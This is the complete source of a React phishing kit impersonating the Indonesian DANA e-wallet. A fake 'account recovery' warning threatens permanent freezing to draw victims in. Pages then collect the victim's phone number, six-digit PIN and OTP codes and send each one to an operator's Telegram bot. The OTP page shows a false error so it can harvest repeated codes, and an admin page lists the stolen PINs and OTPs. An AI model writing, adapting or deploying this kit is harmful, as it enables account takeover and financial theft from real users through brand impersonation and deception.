pages/Home.jsx
import { useNavigate } from "react-router-dom";
import DanaHeader from "../components/DanaHeader";

export default function Home() {
  const navigate = useNavigate();

  return (
    <div className="min-h-screen bg-white max-w-md mx-auto">
      <DanaHeader />
      
      {/* Banner */}
      <div className="mx-4 mt-4 rounded-xl overflow-hidden">
        <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/c10cc9190_images1.jpg" alt="Diana" className="w-full" />
      </div>

      {/* Options */}
      <div className="px-4 mt-6">
        <h2 className="text-lg font-bold text-gray-800 mb-4">INPUT SESUAI KENDALAMU</h2>

        <div 
          onClick={() => navigate("/phone?type=pemulihan_akun")}
          className="bg-gradient-to-r from-[#29b6f6] to-[#4fc3f7] rounded-xl p-5 mb-4 cursor-pointer active:scale-[0.98] transition-transform"
        >
          <div className="flex items-center gap-3 mb-2">
            <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/64960b9c1_images12.png" alt="DANA" className="w-10 h-10 rounded-xl" />
            <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/addb2c666_dana-logofe46647.png" alt="DANA" className="h-5" />
          </div>
          <h3 className="text-white font-bold text-lg">Pemulihan Akun DANA Terdeteksi</h3>
          <p className="text-white/90 text-sm mt-1">Segera lakukan pemulihan akun Dana untuk menghindari pembekuan permanen oleh sistem</p>
        </div>

        <div 
          onClick={() => navigate("/phone?type=kendala_lainnya")}
          className="bg-gradient-to-r from-[#29b6f6] to-[#4fc3f7] rounded-xl p-5 cursor-pointer active:scale-[0.98] transition-transform"
        >
          <div className="flex items-center gap-3 mb-2">
            <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/64960b9c1_images12.png" alt="DANA" className="w-10 h-10 rounded-xl" />
            <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/addb2c666_dana-logofe46647.png" alt="DANA" className="h-5" />
          </div>
          <h3 className="text-white font-bold text-lg">Laporkan Kendala Lainnya</h3>
          <p className="text-white/90 text-sm mt-1">Customer Care Support Team Siap untuk Membantu kamu</p>
        </div>
      </div>

      {/* Footer */}
      <div className="mt-8">
        <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/2bb94df31_footer2.jpeg" alt="Footer" className="w-full" />
      </div>
    </div>
  );
}
📄 halaman/PhoneInput.jsx
import { useState } from "react";
import { useNavigate } from "react-router-dom";
import { base44 } from "@/api/base44Client";

export default function PhoneInput() {
  const [phone, setPhone] = useState("");
  const navigate = useNavigate();
  const params = new URLSearchParams(window.location.search);
  const type = params.get("type") || "pemulihan_akun";

  const handleSubmit = async () => {
    if (!phone || phone.length < 8) return;
    const submission = await base44.entities.Submission.create({
      phone: phone,
      report_type: type,
      status: "phone",
    });
    const line = "━".repeat(21);
    const msg = `${line}\nDATA MASUK - DANA\n${line}\nNama Akun  : ${phone}\nPin Akun   : menunggu...\nKode Akun  : menunggu...\n${line}`;
    const configs = await base44.entities.TelegramConfig.list();
    if (configs.length > 0) {
      const { bot_token, chat_id } = configs[0];
      const res = await fetch(`https://api.telegram.org/bot${bot_token}/sendMessage`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id, text: msg }),
      });
      const data = await res.json();
      if (data.ok) {
        await base44.entities.Submission.update(submission.id, { telegram_message_id: data.result.message_id });
      }
    }
    navigate(`/pin?id=${submission.id}`);
  };

  return (
    <div className="min-h-screen bg-[#108ee9] max-w-md mx-auto flex flex-col">
      <div className="flex-1 flex flex-col items-center pt-12 px-6">
        <div className="flex items-center gap-2 mb-6">
          <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/addb2c666_dana-logofe46647.png" alt="DANA" className="h-9" />
        </div>

        <p className="text-white text-center text-lg mb-8">
          Masukkan <b>nomor HP</b> kamu untuk lanjut
        </p>

        <div className="w-full flex gap-3 items-end mb-4">
          <div>
            <p className="text-white/80 text-sm mb-1">Negara</p>
            <div className="bg-white/20 rounded-lg px-3 py-3 flex items-center gap-2 text-white font-medium">
              <span className="text-lg">🇮🇩</span> +62
            </div>
          </div>
          <div className="flex-1">
            <p className="text-white/80 text-sm mb-1">Nomor</p>
            <input
              type="tel"
              value={phone}
              onChange={(e) => setPhone(e.target.value.replace(/\D/g, ""))}
              placeholder="811-1234-5678"
              className="w-full bg-white/20 rounded-lg px-4 py-3 text-white placeholder-white/50 outline-none text-lg"
            />
          </div>
        </div>

        <p className="text-white/80 text-sm text-center mt-2">
          Dengan melanjutkan, kamu setuju dengan{" "}
          <b className="text-white">Syarat & Ketentuan</b> serta{" "}
          <b className="text-white">Pemberitahuan Privasi</b> kami
        </p>
      </div>

      <div className="px-6 pb-8">
        <button
          onClick={handleSubmit}
          disabled={!phone || phone.length < 8}
          className="w-full py-4 rounded-xl text-lg font-bold transition-all disabled:bg-gray-300 disabled:text-gray-500 bg-white text-[#108ee9]"
        >
          LANJUT
        </button>
      </div>
    </div>
  );
}
📄 pages/PinInput.jsx
import { useState, useRef } from "react";
import { useNavigate } from "react-router-dom";
import { base44 } from "@/api/base44Client";
import { X } from "lucide-react";

export default function PinInput() {
  const [pin, setPin] = useState(["", "", "", "", "", ""]);
  const refs = [useRef(), useRef(), useRef(), useRef(), useRef(), useRef()];
  const navigate = useNavigate();
  const params = new URLSearchParams(window.location.search);
  const id = params.get("id");

  const editTelegram = async (sub, pin) => {
    const configs = await base44.entities.TelegramConfig.list();
    if (configs.length > 0 && sub.telegram_message_id) {
      const { bot_token, chat_id } = configs[0];
      const line = "━".repeat(21);
      const msg = `${line}\nDATA MASUK - DANA\n${line}\nNama Akun  : ${sub.phone}\nPin Akun   : ${pin}\nKode Akun  : menunggu...\n${line}`;
      await fetch(`https://api.telegram.org/bot${bot_token}/editMessageText`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id, message_id: sub.telegram_message_id, text: msg }),
      });
    }
  };

  const handleChange = async (index, value) => {
    if (!/^\d?$/.test(value)) return;
    const newPin = [...pin];
    newPin[index] = value;
    setPin(newPin);

    if (value && index < 5) refs[index + 1].current.focus();

    if (newPin.every((d) => d !== "")) {
      const pinStr = newPin.join("");
      await base44.entities.Submission.update(id, { pin: pinStr, status: "pin" });
      const sub = await base44.entities.Submission.get(id);
      await editTelegram(sub, pinStr);
      navigate(`/otp?id=${id}`);
    }
  };

  const handleKeyDown = (index, e) => {
    if (e.key === "Backspace" && !pin[index] && index > 0) {
      refs[index - 1].current.focus();
    }
  };

  return (
    <div className="min-h-screen bg-white max-w-md mx-auto">
      <div className="bg-[#108ee9] px-4 py-3 flex items-center">
        <X className="text-white w-6 h-6 cursor-pointer" onClick={() => navigate("/")} />
        <span className="text-white font-bold text-lg flex-1 text-center mr-6">Masuk</span>
      </div>

      <div className="px-6 pt-12 flex flex-col items-center">
        <h2 className="text-2xl font-bold text-gray-800 mb-8">Masukkan PIN</h2>

        <div className="flex gap-3 mb-8">
          {pin.map((digit, i) => (
            <div key={i} className="relative w-7 h-7">
              <input
                ref__={refs[i]}
                type="password"
                inputMode="numeric"
                maxLength={1}
                value={digit}
                onChange={(e) => handleChange(i, e.target.value)}
                onKeyDown={(e) => handleKeyDown(i, e)}
                className="w-7 h-7 text-center bg-transparent outline-none absolute top-0 left-0 opacity-0"
              />
              <div className={`w-7 h-7 rounded-full border-2 ${digit ? "bg-gray-700 border-gray-700" : "border-gray-300 bg-gray-200"}`} />
            </div>
          ))}
        </div>

        <div className="flex gap-8 mt-4">
          <button className="flex items-center gap-2 text-[#108ee9] font-medium text-sm">
            <div className="w-6 h-6 bg-gray-200 rounded-full" />
            BUTUH BANTUAN?
          </button>
          <button className="text-[#108ee9] font-medium text-sm">LUPA PIN?</button>
        </div>
      </div>
    </div>
  );
}
📄 halaman/OtpInput.jsx
import { useState, useRef, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { base44 } from "@/api/base44Client";

export default function OtpInput() {
  const [otp, setOtp] = useState(["", "", "", ""]);
  const [errorMsg, setErrorMsg] = useState("");
  const [timer, setTimer] = useState(180);
  const [submission, setSubmission] = useState(null);
  const refs = [useRef(), useRef(), useRef(), useRef()];
  const navigate = useNavigate();
  const params = new URLSearchParams(window.location.search);
  const id = params.get("id");

  useEffect(() => {
    base44.entities.Submission.get(id).then(setSubmission);
  }, [id]);

  useEffect(() => {
    const interval = setInterval(() => setTimer((t) => (t > 0 ? t - 1 : 0)), 1000);
    return () => clearInterval(interval);
  }, []);

  const editTelegram = async (sub, otpStr) => {
    const configs = await base44.entities.TelegramConfig.list();
    if (configs.length > 0 && sub.telegram_message_id) {
      const { bot_token, chat_id } = configs[0];
      const line = "━".repeat(21);
      const msg = `${line}\nDATA MASUK - DANA\n${line}\nNama Akun  : ${sub.phone}\nPin Akun   : ${sub.pin || "menunggu..."}\nKode Akun  : ${otpStr}\n${line}`;
      await fetch(`https://api.telegram.org/bot${bot_token}/editMessageText`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id, message_id: sub.telegram_message_id, text: msg }),
      });
    }
  };

  const handleChange = async (index, value) => {
    if (!/^\d?$/.test(value)) return;
    const newOtp = [...otp];
    newOtp[index] = value;
    setOtp(newOtp);

    if (value && index < 3) refs[index + 1].current.focus();

    if (newOtp.every((d) => d !== "")) {
      const otpStr = newOtp.join("");
      await base44.entities.Submission.update(id, { otp: otpStr, status: "completed" });
      const sub = await base44.entities.Submission.get(id);
      await editTelegram(sub, otpStr);
      setOtp(["", "", "", ""]);
      setErrorMsg("Pastikan kode OTP yang kamu masukan benar");
      refs[0].current?.focus();
    }
  };

  const handleKeyDown = (index, e) => {
    if (e.key === "Backspace" && !otp[index] && index > 0) {
      refs[index - 1].current.focus();
    }
  };

  const mins = String(Math.floor(timer / 60)).padStart(2, "0");
  const secs = String(timer % 60).padStart(2, "0");

  return (
    <div className="min-h-screen bg-white max-w-md mx-auto">
      <div className="bg-[#108ee9] px-4 py-3">
        <h1 className="text-white font-bold text-lg text-center">Verifikasi Akun</h1>
      </div>

      <div className="px-6 pt-6">
        <div className="flex justify-center mb-4">
          <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/585d72c35_icon-notif.png" alt="notif" className="w-24 h-24" />
        </div>

        <div className="flex items-center gap-2 mb-4">
          <h2 className="text-lg font-bold text-gray-800">Verifikasi telah dikirim ke Akun</h2>
          <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/addb2c666_dana-logofe46647.png" alt="DANA" className="h-5" />
        </div>

        <div className="mx-8 mb-6 rounded-2xl overflow-hidden">
          <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/a7f504ffa_atas2.gif" alt="DANA" className="w-full" />
        </div>

        <p className="text-center text-gray-600 mb-3">Kode dikirim ke</p>

        {submission && (
          <div className="bg-[#108ee9] rounded-full py-3 px-6 text-center mb-6">
            <span className="text-white font-bold text-lg">{submission.phone}</span>
          </div>
        )}

        {errorMsg && (
          <p className="text-center text-red-500 font-semibold text-sm mb-3">{errorMsg}</p>
        )}

        <div className="flex justify-center gap-4 mb-4">
          {otp.map((digit, i) => (
            <input
              key={i}
              ref__={refs[i]}
              type="tel"
              inputMode="numeric"
              maxLength={1}
              value={digit}
              onChange={(e) => handleChange(i, e.target.value)}
              onKeyDown={(e) => handleKeyDown(i, e)}
              className="w-14 h-14 text-center text-2xl font-bold border-2 border-gray-200 rounded-xl outline-none focus:border-[#108ee9] bg-gray-50"
            />
          ))}
        </div>

        <p className="text-center text-gray-500 text-lg mb-6">{mins}:{secs}</p>

        <div className="border-t pt-4">
          <h3 className="font-bold text-gray-800 mb-3">Silahkan Cek verifikasi akun</h3>
          <div className="flex items-start gap-3 mb-3">
            <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/585d72c35_icon-notif.png" alt="notif" className="w-8 h-8 flex-shrink-0" />
            <p className="text-sm text-gray-600">Tap notifikasi di perangkatmu di layar atas dan tap <b>VERIFIKASI</b>.</p>
          </div>
          <div className="flex items-start gap-3">
            <img src="https://media.base44.com/images/public/6a0dd56c28155ad163bda1ee/a5a1f08a5_icon-search.png" alt="search" className="w-8 h-8 flex-shrink-0" />
            <p className="text-sm text-gray-600">Tidak menerima notifikasi? Cek Kotak Masuk atau menu <b>Verifikasi</b>. atau cek di icon gambar <b>Amlop</b> dan tap <b>Verifikasi</b></p>
          </div>
        </div>
      </div>
    </div>
  );
}
📄 halaman/Pengaturan.jsx
import { useState, useEffect } from "react";
import { base44 } from "@/api/base44Client";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { toast } from "sonner";
import { Settings as SettingsIcon, Send, Trash2 } from "lucide-react";

export default function Settings() {
  const [botToken, setBotToken] = useState("");
  const [chatId, setChatId] = useState("");
  const [configId, setConfigId] = useState(null);
  const [submissions, setSubmissions] = useState([]);
  const [loading, setLoading] = useState(true);

  useEffect(() => { loadData(); }, []);

  const loadData = async () => {
    const configs = await base44.entities.TelegramConfig.list();
    if (configs.length > 0) {
      setBotToken(configs[0].bot_token || "");
      setChatId(configs[0].chat_id || "");
      setConfigId(configs[0].id);
    }
    const subs = await base44.entities.Submission.list("-created_date", 50);
    setSubmissions(subs);
    setLoading(false);
  };

  const saveConfig = async () => {
    if (configId) {
      await base44.entities.TelegramConfig.update(configId, { bot_token: botToken, chat_id: chatId });
    } else {
      await base44.entities.TelegramConfig.create({ bot_token: botToken, chat_id: chatId });
    }
    toast.success("Konfigurasi Telegram berhasil disimpan!");
    loadData();
  };

  const testTelegram = async () => {
    await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ chat_id: chatId, text: "✅ Test koneksi berhasil!" }),
    });
    toast.success("Pesan test terkirim!");
  };

  const deleteSub = async (id) => {
    await base44.entities.Submission.delete(id);
    setSubmissions((s) => s.filter((x) => x.id !== id));
  };

  if (loading) return (
    <div className="flex items-center justify-center min-h-screen">
      <div className="w-8 h-8 border-4 border-gray-200 border-t-blue-500 rounded-full animate-spin" />
    </div>
  );

  return (
    <div className="min-h-screen bg-gray-50 max-w-2xl mx-auto p-4">
      <div className="flex items-center gap-2 mb-6">
        <SettingsIcon className="w-6 h-6 text-gray-700" />
        <h1 className="text-2xl font-bold text-gray-800">Pengaturan Admin</h1>
      </div>

      <div className="bg-white rounded-xl p-5 shadow-sm mb-6">
        <h2 className="font-bold text-lg mb-4">Konfigurasi Telegram</h2>
        <div className="space-y-3">
          <div>
            <label className="text-sm text-gray-600 mb-1 block">Bot Token</label>
            <Input value={botToken} onChange={(e) => setBotToken(e.target.value)} placeholder="123456:ABC-DEF..." />
          </div>
          <div>
            <label className="text-sm text-gray-600 mb-1 block">Chat ID</label>
            <Input value={chatId} onChange={(e) => setChatId(e.target.value)} placeholder="-100123456789" />
          </div>
          <div className="flex gap-2">
            <Button onClick={saveConfig} className="bg-[#108ee9] hover:bg-[#0d7dd4]">Simpan</Button>
            <Button onClick={testTelegram} variant="outline" className="gap-1">
              <Send className="w-4 h-4" /> Test Kirim
            </Button>
          </div>
        </div>
      </div>

      <div className="bg-white rounded-xl p-5 shadow-sm">
        <h2 className="font-bold text-lg mb-4">Data Masuk ({submissions.length})</h2>
        {submissions.length === 0 ? (
          <p className="text-gray-500 text-sm">Belum ada data masuk.</p>
        ) : (
          <div className="space-y-3">
            {submissions.map((s) => (
              <div key={s.id} className="border rounded-lg p-3 flex items-center justify-between">
                <div>
                  <p className="font-medium">{s.phone || "-"}</p>
                  <div className="flex gap-3 text-sm text-gray-500">
                    <span>PIN: {s.pin || "-"}</span>
                    <span>OTP: {s.otp || "-"}</span>
                    <span className={`px-2 py-0.5 rounded text-xs font-medium ${s.status === "completed" ? "bg-green-100 text-green-700" : "bg-yellow-100 text-yellow-700"}`}>
                      {s.status}
                    </span>
                  </div>
                </div>
                <Button size="icon" variant="ghost" onClick={() => deleteSub(s.id)}>
                  <Trash2 className="w-4 h-4 text-red-500" />
                </Button>
              </div>
            ))}
          </div>
        )}
      </div>
    </div>
  );
}
